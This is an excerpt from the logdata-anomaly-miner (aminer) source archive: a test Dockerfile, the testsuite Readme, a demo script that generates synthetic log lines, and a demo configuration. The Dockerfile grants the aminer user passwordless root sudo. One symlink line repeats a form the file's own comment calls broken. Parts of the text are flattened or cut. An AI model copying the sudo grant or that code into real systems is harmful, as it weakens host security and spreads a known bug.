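    && useradd -ms /usr/sbin/nologin aminer && mkdir -p /var/lib/aminer/log && chmod 0755 /aminerwrapper.sh \
    && chown aminer.aminer -R /var/lib/aminer && chmod 0755 /etc/aminer

# Link the compiled posix1e extension (from python3-pylibacl) into the aminer
# module directory under its own file name.
# The FILE assignment and the ln call are joined with "&&" on purpose: the
# previous "FILE=$(...) ln -s $PACK .../$FILE" form made FILE a command-scoped
# assignment, and the shell expands the arguments before such an assignment
# takes effect, so $FILE was empty and the link only received the right name
# because the target happened to end in a directory path.
RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) \
    && FILE=$(echo $PACK | awk -F '/' '{print $NF}') \
    && ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE

# Add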
config ADD source/root/etc/aminer /etc/aminer # Copy the testsuite ADD aecid-testsuite /home/aminer/aecid-testsuite RUN chown aminer.aminer -R /home/aminer \ && ln -s /usr/lib/logdata-anomaly-miner/aminer /home/aminer/aecid-testsuite/aminer \ && ln -s /etc/aminer/template_config.py /home/aminer/aecid-testsuite/demo/aminer/template_config.py \ && ln -s /etc/aminer/template_config.yml /home/aminer/aecid-testsuite/demo/aminer/template_config.yml \ && chmod +x /home/aminer/aecid-testsuite/*.sh \ && echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer ADD scripts/testingwrapper.sh /testingwrapper.sh ADD source /home/aminer/source ADD docs /home/aminer/docs RUN pip3 install orjson RUN PACK=$(find /usr/local/lib/ -name orjson.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE USER aminer WORKDIR /home/aminer/aecid-testsuite # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/testingwrapper.sh"] logdata-anomaly-miner-2.6.1/aecid-testsuite/Readme.md000066400000000000000000000540001437606560100225230ustar00rootroot00000000000000# aecid-testsuite This project includes all kinds of tests for *AECID* and *aminer*. We used Docker instances for testing (see: [How to use the aecid-testsuite](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite)). The aminer was successfully tested with all tests in **Ubuntu 20.04** and **Debian Bullseye**. In order to execute test classes the current path must be the *logdata-anomaly-miner* directory and the project structure must be as following: ## Guidelines for testing To provide the best quality of code possible we use the guidelines described in this chapter for all unittests. Before writing the unittests, a complete index should be created with all test cases for the component. This index must be reviewed with at least another person who knows the component. 
If the rules are followed, a reviewer should be able to see very clearly: * What is being tested? * Which INPUT is used for testing? * Which OUTPUT was expected? ### General Rules - Unittest classes must be named \<ComponentName\>Test.py - Parameter initialization: every test has to initialize its own values to prevent unintentional changes in different test cases. - Input values must not be initialized in setup methods or as global variables. - It should be clear what input a unittest uses and what output is expected. - A unittest may only cover one case and no more. - Wherever possible, a test should only deliver an assert, unless the state that arises in the test is explicitly checked. - Unittests must follow this naming pattern (for every test class the numbering is reset): test\<#number of test\>\_\\_\ - Unittests must contain a description in the form of a docstring in which the structure of the test, the tested input value and the expected output are described. - Unittests must not have any dependencies on each other, and any global changes must be reset after every test case. Every test case must run independently of other tests. - Unittest cases must only contain the tested components and only the necessary input values. - Cases must test only one component. Dependencies on other classes or handlers must be resolved by dummy classes without functionality. - Test cases must be as short as possible. If a test case fails, it should be clear what the error is. - Test code should be readable, so that the input and expected output values are easy to see. - Tests should be as simple as possible. If this is not possible, we should think again about the structure of our code: this can be a clear indication that the code is not clear and simple. - Helper functions should also be tested separately. ### Rules for input values - All, or as many as possible / meaningful, parameters must be tested. If it is not possible to test all cases, at least the edge cases must be tested. 
- Correlations between parameters must be examined and combinations must be tested extensively. - Expected error cases must be tested. - All paths that lead to exceptions must be tested separately. - Different return values must also be tested. - Inputs must not be random or time based. Unittests must always lead to the same expected outputs. ## Unit-Tests ```logdata-anomaly-miner/ ├── aminer │ ├── __init__.py │ ├── AminerConfig.py │ ├── AnalysisChild.py │ ├── analysis │ ├── ... │ ├── events │ ├── ... │ ├── generic │ ├── ... │ ├── input │ ├── ... │ ├── parsing │ ├── ... │ ├── input │ ├── ... │ ├── util │ ├── ... ├── unit ├── __init__.py ├── analysis ├── __init__.py ├── AtomFiltersTest.py ├── EnhancedNewMatchPathValueComboDetectorTest.py ├── HistogramAnalysisTest.py ├── MatchValueAverageChangeDetectorTest.py ├── MatchValueStreamWriterTest.py ├── MissingMatchPathValueDetectorTest.py ├── NewMatchPathDetectorTest.py ├── NewMatchPathValueComboDetectorTest.py ├── NewMatchPathValueDetectorTest.py ├── RulesTest.py ├── TimestampCorrectionFiltersTest.py ├── TimestampsUnsortedDetectorTest.py ├── AllowlistViolationDetectorTest.py ├── ... ├── events ├── __init__.py ├── DefaultMailNotificationEventHandlerTest.py ├── StreamPrinterEventHandlerTest.py ├── SyslogWriterEventHandlerTest.py ├── UtilsTest.py ├── ... ├── generic ├── __init__.py ├── CronParsingModelTest.py ├── input ├── __init__.py ├── ByteStreamLineAtomizerTest.py ├── LogStreamTest.py ├── SimpleByteStreamLineAtomizerFactoryTest.py ├── SimpleMultisourceAtomSyncTest.py ├── SimpleUnparsedAtomHandlerTest.py ├── ... ├── testutilities ├── config.py ├── ... 
├── parsing ├── __init__.py ├── AnyByteDataModelElementTest.py ├── DateTimeModelElementTest.py ├── DebugModelElementTest.py ├── DecimalFloatValueModelElementTest.py ├── DecimalIntegerValueModelElementTest.py ├── DelimitedDataModelElementTest.py ├── FirstMatchModelElementTest.py ├── FixedDataModelElementTest.py ├── FixedWordlistDataModelElementTest.py ├── HexStringModelElementTest.py ├── IpAddressDataModelElementTest.py ├── MatchElementTest.py ├── OptionalMatchModelElementTest.py ├── ParserMatchTest.py ├── RepeatedElementDataModelElementTest.py ├── SequenceModelElementTest.py ├── VariableByteDataModelElementTest.py ├── ... ├── util ├── __init__.py ├── JsonUtilTest.py ├── PersistenceUtilTest.py ├── SecureOSFunctionsTest.py ├── ... ``` Before starting any test case the path to the *config.py* should be changed. This can be achieved recursively by using following command (*/path/to/config.py* needs to be changed.): ``` sudo find . -type f -name "*Test.py" -print0 | xargs -0 sed -i -e 's#/home/user/Downloads/logdata-anomaly-miner-1.0.0/logdata-anomaly-miner/source/root/etc/aminer/config.py#/path/to/config.py#g' ``` Every test case can be executed by using following command in the main directory: ``` python3 -m unittest discover -s unit -p '*Test.py' ``` Single test classes can be executed with this command: ``` python3 -m unittest ``` for example: ``` python3 -m unittest unit/parsing/AnyByteDataModelElementTest.py ``` The created mails under */var/spool/mail/root* should be deleted. ## Integration Testing: To prepare every test the associated configuration file(s) first must be copied to */tmp*. The test-scripts **MUST NOT** be run as root. In addition, **declarations.sh** must be in the **same folder** as the integration test being run. Please note that the script needs root privileges for running the *aminer* and all **persistent data is deleted** from */tmp/lib/aminer*! ### Integration Test 1: In this integration test the learning phase of the aminer is tested. 
Multiple log lines are learned and then checked. Some analysis components are used and all other lines are handled by the *SimpleUnparsedAtomHandler*. The events are received by a *DefaultMailNotificationEventHandler* and a *StreamPrinterEventHandler*. Other lines are used to check whether the paths were learned and persisted in the persistence directory of the *aminer*. In this test case the *SubhandlerFilter* is suitable, because only one file, */tmp/syslog*, is monitored. The following command makes the script executable: ``` sudo chmod +x aminerIntegrationTest.sh ``` **config.py** must be copied to */tmp/config.py*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest.sh ``` ### Integration Test 2: In this integration test multiple log files are used with the *SimpleMultisourceAtomSync*-handler with (*config22.py*) and without (*config21.py*) a defaultTimestampPath. Therefore the test is divided into two parts. The log lines all have different times and are distributed in */tmp/syslog* and */tmp/auth.log*; they should be in the correct order while running the test. The consistency and correctness of the output of the receiveEvent method are also tested. The *analysis*-components are the same as in the first integration test. This test case also uses the *SyslogWriterEventHandler* and checks the output against the expected results. The following command makes the script executable: ``` sudo chmod +x aminerIntegrationTest2.sh ``` **config21.py** and **config22.py** must be copied to */tmp/*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest2.sh ``` ## Demo: The goal of this demo is to create a representative output of all the different *analysis*-components of the *aminer*. 
Every component has its own comment section, which starts with **:< /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/demo-config.py if ! test -f "$FILE"; then FILE=/tmp/demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi fi #start aminer sudo aminer --config "$FILE" & PID=$! #EventCorrelationDetector, NewMatchPathDetector #:<> $LOGFILE sleep 0.0001 done #Comment #EnhancedNewMatchPathValueComboDetector, NewMatchPathValueDetector, ModuloTimeMatchRule #:<> $LOGFILE done done #Comment #HistogramAnalysis, MatchFilter #:<> $LOGFILE t=`date +%s` done #PathDependentHistogramAnalysis sleep 0.5 echo "Generating data for the ModuloTimeBinDefinition histogram report.." startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+11` ]]; do R=`shuf -i 0-86400 -n 1` echo "Random: $R" >> $LOGFILE t=`date +%s` done #Comment #MatchValueAverageChangeDetector #:<> $LOGFILE t=`date +%s` done startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+1` ]]; do R=`shuf -i 300-1000 -n 1` echo $R >> $LOGFILE t=`date +%s` done #Comment #MatchValueStreamWriter #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #MissingMatchPathValueDetector, NewMatchPathDetector #:<> $LOGFILE sleep 3 #MissingMatchPathValue expected echo second echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 0.5 #No output expected echo third echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 4 #MissingMatchPathValue expected echo fourth echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE #Comment #NewMatchPathValueComboDetector, NewMatchPathValueDetector #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment 
#NewMatchIdValueComboDetector #:<> $LOGFILE echo 'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH 
msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 
success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE # StringRegexMatchRule echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=no exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE #Comment #TimeCorrelationDetector #At least 3000 lines must be passed to trigger the TimeCorrelationDetector. #TimeCorrelationViolationDetector #The input text is saying that the time between cron job announcement and execution is 5 minutes, but in reality it is 5 seconds for more convenience. #:<> $LOGFILE sleep 4 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #wrong Job Number ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." 
| tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50001]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #expected time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #too long time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 7 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #Comment # AllowlistRules, AllowlistViolationDetector #:<> $LOGFILE echo "User root logged in" >> $LOGFILE who | awk '{print $1,$3,$4}' | while read user time; do \ echo User $user logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago.>> $LOGFILE echo User root logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago. 
>> $LOGFILE; done #Comment #:<> $LOGFILE # AnyByteDataModelElement echo "Any:dafsdff12%3§fasß?–_=yy" >> $LOGFILE echo "Any:äöüß" >> $LOGFILE # Base64StringModelElement echo "VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg==" >> $LOGFILE # DateTimeModelElement ({ echo "Current DateTime: " && date '+%d.%m.%Y %T' | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE # DecimalFloatValueModelElement echo "-25878952156245.222239655488955" >> $LOGFILE # DecimalIntegerValueModelElement echo "- 3695465546654" >> $LOGFILE # DelimitedDataModelElement echo "This is some part of a csv file;" >> $LOGFILE # ElementValueBranchModelElement echo "match data: 25000" >> $LOGFILE # HexStringModelElement echo "b654686973206973206a7573742061206e6f726d616c2074657874" >> $LOGFILE # IpAddressModelElement echo "Gateway IP-Address: 192.168.128.225" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.8.8" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.4.4" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 10.0.0.0" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 11.0.0.0" >> $LOGFILE # MultiLocaleDateTimeModelElement echo "Feb 25 2019" >> $LOGFILE # OptionalMatchModelElement echo "The-searched-element-was-found!" >> $LOGFILE # RepeatedElementDataModelElement for i in {1..5}; do R=`shuf -i 1-45 -n 1` echo "[drawn number]: $R" | tr -d "\n" >> $LOGFILE done echo "" >> $LOGFILE # VariableByteDataModelElement echo "---------------------------------------------------------------------" >> $LOGFILE # WhiteSpaceLimitedDataModelElement alphabet="abcdefghijklmnopqrstuvwxyz " text="z" for i in {1..1000}; do R=`shuf -i 0-26 -n 1` text=$text${alphabet:R:1} if [ $R -eq 26 ]; then break fi done echo "$text" >> $LOGFILE #Comment #stop aminer sleep 3 & wait $! sudo pkill -x aminer wait $PID RES=$? 
sudo rm $LOGFILE exit $RES logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminer/demo-config.py000066400000000000000000000756101437606560100257560ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # skipcq: PY-W0072 # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' config_properties['Core.LogDir'] = '/tmp/lib/aminer/log' # skipcq: BAN-B108 # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. 
# Persistence: where aminer stores state between invocations and how often
# (in seconds) it is written. This demo path lives below /tmp, whose parent
# is world-writable; the persistence directory itself must still be readable
# by the 'AminerUser' only, as described for Core.PersistenceDir above.
config_properties.update({
    'Core.PersistenceDir': '/tmp/lib/aminer',  # skipcq: BAN-B108
    'Core.PersistencePeriod': 600,
})

# E-mail alerting.
# - TargetAddress: when undefined, no e-mail notification hooks are added.
# - FromAddress: when undefined, the host's "sendmail" implementation picks
#   the sender address.
# - SubjectPrefix: text prepended to the standard aminer subject; defaults
#   to "aminer Alerts:".
# - AlertGraceTime: seconds after startup before the first alert e-mail may
#   be sent; defaults to 0 (any event can immediately trigger alerting).
# - EventCollectTime: seconds to wait after the first event before the mail
#   is sent, so that events in that span are batched into a single e-mail;
#   defaults to 10.
# - MinAlertGap: minimum seconds between two alert e-mails; events inside
#   the gap are collected for the next report; defaults to 600.
# - MaxAlertGap: maximum seconds between two alert e-mails; when undefined it
#   equals MinAlertGap, otherwise an exponential backoff raises the gap by
#   50% whenever alert-worthy events arrive before the previous gap elapsed.
# The demo sets the collect time and the minimum gap to 0 so every event is
# mailed right away; in a real deployment keep the defaults, they are what
# limits the volume of alert mail during a permanent error state.
config_properties.update({
    'MailAlerting.TargetAddress': 'root@localhost',
    'MailAlerting.FromAddress': 'root@localhost',
    'MailAlerting.SubjectPrefix': 'aminer Alerts:',
    'MailAlerting.AlertGraceTime': 0,
    'MailAlerting.EventCollectTime': 0,
    'MailAlerting.MinAlertGap': 0,
    'MailAlerting.MaxAlertGap': 600,
})
# Define how many events should be included in one alert mail
# at most.
# This defaults to 1000
config_properties['MailAlerting.MaxEventsPerMessage'] = 1000
config_properties['LogPrefix'] = 'Original log line: '
config_properties['Log.StatisticsPeriod'] = 3600
config_properties['Log.StatisticsLevel'] = 1
config_properties['Log.DebugLevel'] = 1
config_properties['Log.Rotation.BackupCount'] = 5
config_properties['Log.Rotation.MaxBytes'] = 104857600  # 100 Megabytes

# Add your ruleset here:
def build_analysis_pipeline(analysis_context):
    """
    Build the demo parsing model and the full analysis pipeline.

    This function is the aminer entry point for a Python-style configuration. It
    (1) assembles a parsing model for the synthetic demo log lines (cron, disk report,
    login details, sensor readings, IP address changes, Linux audit records and a set
    of lines exercising each parser element), (2) installs an AtomizerFactory on
    ``analysis_context.atomizer_factory`` so aminer knows how to turn the incoming
    byte stream into log atoms, and (3) registers one instance of (almost) every
    detector shipped with aminer on the analysis context and attaches it to a single
    SubhandlerFilter.

    :param analysis_context: the aminer analysis context; this function calls its
        ``register_component()`` method, reads ``aminer_config`` and assigns
        ``atomizer_factory``.
    :return: None. All results are side effects on ``analysis_context``.

    NOTE(review): most detectors below are created with ``learn_mode=True``. Presumably that
    makes them accept previously unseen values/paths as the new normal; running such a
    configuration against untrusted production input would allow an attacker to "train in"
    their own activity (model poisoning). Treat this file as a demo, not a hardening baseline.
    """
    date_format_string = b'%Y-%m-%d %H:%M:%S'
    cron = b' cron['

    # Build the parsing model:
    from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
    from aminer.parsing.SequenceModelElement import SequenceModelElement
    from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
    from aminer.parsing.FixedDataModelElement import FixedDataModelElement
    from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
    from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
    from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
    from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
    from aminer.parsing.DateTimeModelElement import DateTimeModelElement, MultiLocaleDateTimeModelElement
    from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
    from aminer.parsing.Base64StringModelElement import Base64StringModelElement
    from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
    from aminer.parsing.HexStringModelElement import HexStringModelElement
    from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
    from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement
    from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
    from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement

    # Each ``service_children_*`` list is a sequence of parser elements that is later wrapped
    # in a SequenceModelElement and attached to the top-level FirstMatchModelElement ``model``.
    # The element names (first argument) become path components such as
    # ``/model/DiskReport/Space`` that the detectors below refer to.

    # "Current Disk Data is: ..." line; everything after the first '%' is swallowed by the AnyByte element.
    service_children_disk_report = [
        FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'),
        DelimitedDataModelElement('Data', b'%'),
        AnyByteDataModelElement('Rest')]

    # "User <name> logged in|logged out[ <n> minutes ago.]"; the trailing part is optional.
    service_children_login_details = [
        FixedDataModelElement('User/LoginDetails', b'User '),
        DelimitedDataModelElement('Username', b' '),
        FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']),
        OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [
            FixedDataModelElement('Blank', b' '),
            DecimalIntegerValueModelElement('Minutes'),
            FixedDataModelElement('Ago', b' minutes ago.')]))]

    # "<timestamp> <uname> <user> cron[<job>]: Job `cron.daily` started."
    service_children_cron_job = [
        DateTimeModelElement('DTM', date_format_string),
        FixedDataModelElement('UNameSpace1', b' '),
        DelimitedDataModelElement('UName', b' '),
        FixedDataModelElement('UNameSpace2', b' '),
        DelimitedDataModelElement('User', b' '),
        FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'),
        FixedDataModelElement('Details', b']: Job `cron.daily` started.')]

    # "Random: <n>"
    service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')]

    # "CPU Temp: <n>°C, CPU Workload: <n>%, <timestamp>"; the degree sign is the UTF-8 byte pair C2 B0.
    service_children_sensors = [
        SequenceModelElement('CPUTemp', [
            FixedDataModelElement('FixedTemp', b'CPU Temp: '),
            DecimalIntegerValueModelElement('Temp'),
            FixedDataModelElement('Degrees', b'\xc2\xb0C')]),
        FixedDataModelElement('Space1', b', '),
        SequenceModelElement('CPUWorkload', [
            FixedDataModelElement('FixedWorkload', b'CPU Workload: '),
            DecimalIntegerValueModelElement('Workload'),
            FixedDataModelElement('Percent', b'%')]),
        FixedDataModelElement('Space2', b', '),
        DateTimeModelElement('DTM', date_format_string)]

    # "User <name> changed IP address to <ip>"
    service_children_user_ip_address = [
        FixedDataModelElement('User/UserIPAddress', b'User '),
        DelimitedDataModelElement('Username', b' '),
        FixedDataModelElement('Action', b' changed IP address to '),
        IpAddressDataModelElement('IP')]

    # "<timestamp> <uname> cron[<job>]: Will run job `cron.<type>' in 5 min."
    service_children_cron_job_announcement = [
        DateTimeModelElement('DTM', date_format_string),
        FixedDataModelElement('Space', b' '),
        DelimitedDataModelElement('UName', b' '),
        FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'),
        FixedDataModelElement('Run', b']: Will run job `'),
        FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']),
        FixedDataModelElement('StartTime', b'\' in 5 min.')]

    # "<timestamp> <uname> cron[<job>]: Job `cron.<type>' started"
    service_children_cron_job_execution = [
        DateTimeModelElement('DTM', date_format_string),
        FixedDataModelElement('Space1', b' '),
        DelimitedDataModelElement('UName', b' '),
        FixedDataModelElement('Cron', cron),
        DecimalIntegerValueModelElement('JobNumber'),
        FixedDataModelElement('Job', b']: Job `'),
        FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']),
        FixedDataModelElement('Started', b'\' started')]

    # Linux audit records: one branch for ``type=PATH`` and one for ``type=SYSCALL``.
    # Both share the ``msg=audit(<time>:<id>)`` prefix; the <id> is what the
